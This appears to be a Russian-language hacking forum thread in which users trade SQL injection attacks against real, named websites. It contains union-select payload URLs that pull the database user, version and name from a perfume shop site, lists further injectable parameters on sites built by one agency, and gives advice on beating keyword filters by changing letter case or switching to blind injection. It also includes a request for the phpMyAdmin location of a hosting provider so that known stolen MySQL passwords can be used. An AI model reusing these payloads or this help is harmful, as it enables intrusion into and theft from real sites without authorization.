http://gcmpp.ru/info.php

а как дальше?
http://all-perfumes.com.ua/index.php?act=publ&id=-39%20union%20select%201,2,3,4,5

Дальше только перебор ибо 4 ветка без доступа к mysql и как правило file_priv в N:
http://all-perfumes.com.ua/index.php?act=publ&id=-39+union+select+1,2,3,4,unhex(hex(concat_ws(0x3A,u ser(),@@version,database())))

http://all-perfumes.com.ua/index.php?act=publ&id=-39+union+select+1,2,3,4,unhex(hex(version()))-- почему в unhex(hex(version()))? Потому что, когда мы ставим просто version() вылетает ошибка. Будем кодировать) Версия 4, т.е. таблицы через information_schema найти не получится =( Проверим file_priv, стандартные таблицы... Ничего не нашел =( Даже побрутил и ничего не вышло( Но зато это агенство всем наклепало свои уязвимые движки =) Смотрит сайты тут: http://www.web-sites.kiev.ua/portfolio.php Ошибки тут: index.php?act=goods&id=7'&gid=11
index.php?act=page&p=2'

Если найти таблицы, то можно писать сплоит)



P.S: А я вот решил глянуть мой именно домен) http://tigger.com/inspirations/install.php?error=true - вот итог =) Хм... Я так понимаю, что это /install/ но почему-то дальше не хочет =( может есть вариант какой-нибудь)?

Radiator, сплоит ищи под ядро.

сегодня столкнулся с такой проблемой:

через group by определил кол колонок...

а когда уже пишут +union+select.....
слово union заменяется на "тра та та"
как эту хрень обойти?

попробуй регистр букв менять, например UniOn UNiON, а если там нормальная фильтрация, то болт и тебе придётся использовать блайнд-скул.

__________________
Появляюсь редко. Важные дела в реале.

Вопрос не по уязмимость но задам сюда:
Где находится PhpMyAdmin у хостинга www.infobox.ru
Просто есть сайт у которого знаю пассы от MySQL а зайти туда только с локала похоже можно (в файле конфига у сайта хост прописан: "mysqlserver")
Кто пользуется этим хостингом или просто знает где у них можно зайти, напишите плиз.

http://mysql.infobox.ru/ - вот лови адрес